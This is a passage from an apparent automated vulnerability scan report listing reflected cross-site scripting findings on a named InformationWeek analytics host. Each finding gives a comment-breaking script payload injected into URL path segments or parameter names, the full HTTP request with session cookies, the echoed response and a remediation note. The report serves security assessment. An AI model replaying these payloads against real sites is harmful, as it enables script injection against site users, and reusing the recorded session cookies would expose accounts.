The value of REST URL parameter 4 is copied into an HTML comment. The payload fec08--><script>alert(1)</script>8c1aeff968c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/105/Healthcare/Healthcare.htmlfec08--><script>alert(1)</script>8c1aeff968c HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:30 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2FHealthcare%2FHealthcare.htmlfec08--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c1aeff968c&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.htmlfec08--><script>alert(1)</script>8c1aeff968c"> ...[SNIP]...
3.60. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/105/Healthcare/Healthcare.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ecec8--><script>alert(1)</script>296d0d5c564 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/105/Healthcare/Healthcare.html?ecec8--><script>alert(1)</script>296d0d5c564=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... care%2FHealthcare.html%3Fecec8--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E296d0d5c564%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html?ecec8--><script>alert(1)</script>296d0d5c564=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 35762--><script>alert(1)</script>26950b9f17e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu35762--><script>alert(1)</script>26950b9f17e/106/Financial/Financial.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 02:11:24 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:24 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... informationweek.com%2Fmenu35762--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E26950b9f17e%2F106%2FFinancial%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu35762--><script>alert(1)</script>26950b9f17e/106/Financial/Financial.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload a80e4--><script>alert(1)</script>b9fe4f616f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106a80e4--><script>alert(1)</script>b9fe4f616f3/Financial/Financial.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 02:11:33 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:33 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... rmationweek.com%2Fmenu%2F106a80e4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb9fe4f616f3%2FFinancial%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106a80e4--><script>alert(1)</script>b9fe4f616f3/Financial/Financial.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 3bdd8--><script>alert(1)</script>74351014ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106/Financial3bdd8--><script>alert(1)</script>74351014ad/Financial.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 02:11:50 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:50 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45903
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ek.com%2Fmenu%2F106%2FFinancial3bdd8--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E74351014ad%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial3bdd8--><script>alert(1)</script>74351014ad/Financial.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 9221b--><script>alert(1)</script>bde86b314b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106/Financial/Financial.html9221b--><script>alert(1)</script>bde86b314b0 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 02:12:28 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:12:28 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 106%2FFinancial%2FFinancial.html9221b--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebde86b314b0&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial/Financial.html9221b--><script>alert(1)</script>bde86b314b0"> ...[SNIP]...
3.65. http://analytics.informationweek.com/menu/106/Financial/Financial.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/106/Financial/Financial.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b1f78--><script>alert(1)</script>119c5ed8843 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106/Financial/Financial.html?b1f78--><script>alert(1)</script>119c5ed8843=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nancial%2FFinancial.html%3Fb1f78--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E119c5ed8843%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial/Financial.html?b1f78--><script>alert(1)</script>119c5ed8843=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 280d2--><script>alert(1)</script>7fd66fc442e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu280d2--><script>alert(1)</script>7fd66fc442e/13/Outsourcing-and-services/Outsourcing-services.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:32 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:32 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... u280d2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7fd66fc442e%2F13%2FOutsourcing-and-services%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu280d2--><script>alert(1)</script>7fd66fc442e/13/Outsourcing-and-services/Outsourcing-services.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload f5cfa--><script>alert(1)</script>bc24ee3df37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/13f5cfa--><script>alert(1)</script>bc24ee3df37/Outsourcing-and-services/Outsourcing-services.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:44 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:44 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F13f5cfa--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebc24ee3df37%2FOutsourcing-and-services%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13f5cfa--><script>alert(1)</script>bc24ee3df37/Outsourcing-and-services/Outsourcing-services.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 9e007--><script>alert(1)</script>d20170e2eff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/13/Outsourcing-and-services9e007--><script>alert(1)</script>d20170e2eff/Outsourcing-services.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:55 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:55 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... vices9e007--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed20170e2eff%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services9e007--><script>alert(1)</script>d20170e2eff/Outsourcing-services.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload bade7--><script>alert(1)</script>a6b7121472a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/13/Outsourcing-and-services/Outsourcing-services.htmlbade7--><script>alert(1)</script>a6b7121472a HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:50:37 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:50:37 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... es.htmlbade7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea6b7121472a&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.htmlbade7--><script>alert(1)</script>a6b7121472a"> ...[SNIP]...
3.70. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6d1b3--><script>alert(1)</script>ffaca7e1bef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/13/Outsourcing-and-services/Outsourcing-services.html?6d1b3--><script>alert(1)</script>ffaca7e1bef=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3F6d1b3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Effaca7e1bef%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html?6d1b3--><script>alert(1)</script>ffaca7e1bef=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3497a--><script>alert(1)</script>b14e7e078f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu3497a--><script>alert(1)</script>b14e7e078f4/14/Regulatory-compliance/Regulatory-compliance.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:13 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:14 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... enu3497a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb14e7e078f4%2F14%2FRegulatory-compliance%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu3497a--><script>alert(1)</script>b14e7e078f4/14/Regulatory-compliance/Regulatory-compliance.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 8f0a9--><script>alert(1)</script>e0ead1f783e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/148f0a9--><script>alert(1)</script>e0ead1f783e/Regulatory-compliance/Regulatory-compliance.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:29 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %2F148f0a9--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee0ead1f783e%2FRegulatory-compliance%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/148f0a9--><script>alert(1)</script>e0ead1f783e/Regulatory-compliance/Regulatory-compliance.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 99475--><script>alert(1)</script>1d835a1e36b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
